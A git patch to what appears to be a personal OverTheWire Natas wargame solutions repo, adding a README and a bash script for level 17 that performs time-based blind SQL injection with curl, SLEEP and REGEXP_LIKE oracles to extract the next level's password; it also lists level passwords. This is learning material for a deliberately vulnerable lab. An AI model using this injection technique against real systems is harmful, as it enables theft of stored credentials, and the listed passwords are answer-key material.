From fb07d1005a92e602b66711b961b38e9c9f45604a Mon Sep 17 00:00:00 2001 From: Emile Clark-Boman Date: Tue, 15 Jul 2025 22:52:15 +1000 Subject: [PATCH] +README.md --- overthewire/natas/README.md | 8 +++ overthewire/natas/passwords.md | 111 +++++++++++++++++++++++++++++++++ 2 files changed, 119 insertions(+) create mode 100644 overthewire/natas/README.md diff --git a/overthewire/natas/README.md b/overthewire/natas/README.md new file mode 100644 index 0000000..7670def --- /dev/null +++ b/overthewire/natas/README.md @@ -0,0 +1,8 @@ +## Natas +If you're reading this then probably don't. These scripts are inefficient, +written entirely for my learning, and not designed to teach anyone. +> **Note to Self:** All the solutions are written in bash even though its +> incredibly inefficient for these questions. Simply because I need to +> improve my ability to use bash for complex scripts so yeah!! + + diff --git a/overthewire/natas/passwords.md b/overthewire/natas/passwords.md index b6a8f71..c3cd1ec 100644 --- a/overthewire/natas/passwords.md +++ b/overthewire/natas/passwords.md @@ -1,3 +1,4 @@ +### Passwords + Methodology natas0: natas0 natas1: 0nzCigAq7t2iALyvU9xcHlYN4MlkIwlq View source @@ -279,4 +280,114 @@ done echo ``` +###### Natas17 Solution Script +```bash +#!/usr/bin/env bash +USERNAME="natas17" +PASSWORD="EqjHJbo7LFNb8vwhHb9s75hokh5TF0OC" +TARGET="natas18" + +DELAY=4 +PREFIX="5mxv8BZZVSMzzYPcY95M9m" + +req() { + CMD=$@ + curl "http://$USERNAME.natas.labs.overthewire.org/index.php" \ + -X POST \ + -u "$USERNAME:$PASSWORD" \ + -d "username=natas18\" AND $CMD AND SLEEP($DELAY) # " \ + -sS &>/dev/null +} + +time_req() ( + export STAT + export CMD="$@" + (time (req $CMD; STAT=$?)) \ + |& grep real \ + | awk '{print substr($2, 3, 1)}' + return $STAT +) + +# ie `guess_length "=32"` or `guess_length ">32"` +guess_length() { + ELAPSED=$(time_req "LENGTH(password)$1") + return $(( ELAPSED < DELAY )) +} + +get_length() { + echo "[*] Guessing length" + local MIN=${1:-1} + local MAX=${2:-100} + # local PADMAX=${#MAX} + local FGUESS="%${#MAX}s-%-${#MAX}s" + while true; do + printf "[-] Guess: $FGUESS\r" $MIN $MAX + if [ $((MAX-MIN)) -eq 1 ]; then + break + fi; + + local MID=$(( (MAX+MIN)/2 )) + guess_length ">$MID" && MIN=$MID || MAX=$MID + done + printf "[+] Found: $FGUESS\n" $MIN $MAX + return $MAX +} + +LOWER="abcdefghijklmnopqrstuvwxyz" +UPPER="ABCDEFGHIJKLMNOPQRSTUVWXYZ" +DIGIT="0123456789" + +guess_regex() { + ELAPSED=$(time_req "REGEXP_LIKE(password, '^$1[a-zA-Z0-9]*\$', 'c')") + return $(( ELAPSED < DELAY )) +} + +exploit_oracle() { + echo "[@] Forcing oracle exploit" + local PREFIX="" + local LENGTH=$1 + + while true; do + if [ "${#PREFIX}" = "$LENGTH" ]; then + break + fi + + for chars in $LOWER $UPPER $DIGIT; do + local MIN=1 + local MAX=${#chars} + + local RANGE="[${chars:MIN-1:1}-${chars:MAX-1:1}]" + echo -en "[*] ?? $RANGE\r" + guess_regex "$PREFIX$RANGE$POSTFIX" || continue + echo "[+] Found[CHARSET]: $chars" + + local MID=$(( (MAX+MIN)/2 )) + while true; do + echo -en "[*] Guess: $RANGE\r" + if [ $((MAX-MIN)) -eq 1 ]; then + local NEWCHAR + if guess_regex "$PREFIX${chars:MIN-1:1}"; then + NEWCHAR=${chars:MIN-1:1} + else + NEWCHAR=${chars:MAX-1:1} + fi + PREFIX="$PREFIX$NEWCHAR" + echo -e "[+] Update: $NEWCHAR -> $PREFIX" + break + fi; + + MID=$(( (MAX+MIN)/2 )) + RANGE="[${chars:MIN-1:1}-${chars:MID-1:1}]" + guess_regex "$PREFIX$RANGE" && MAX=$MID || MIN=$MID + done + break + done + done + printf "[+] Found: $FGUESS\n" $MIN $MAX +} + +get_length +LENGTH=$? +exploit_oracle "$LENGTH" +```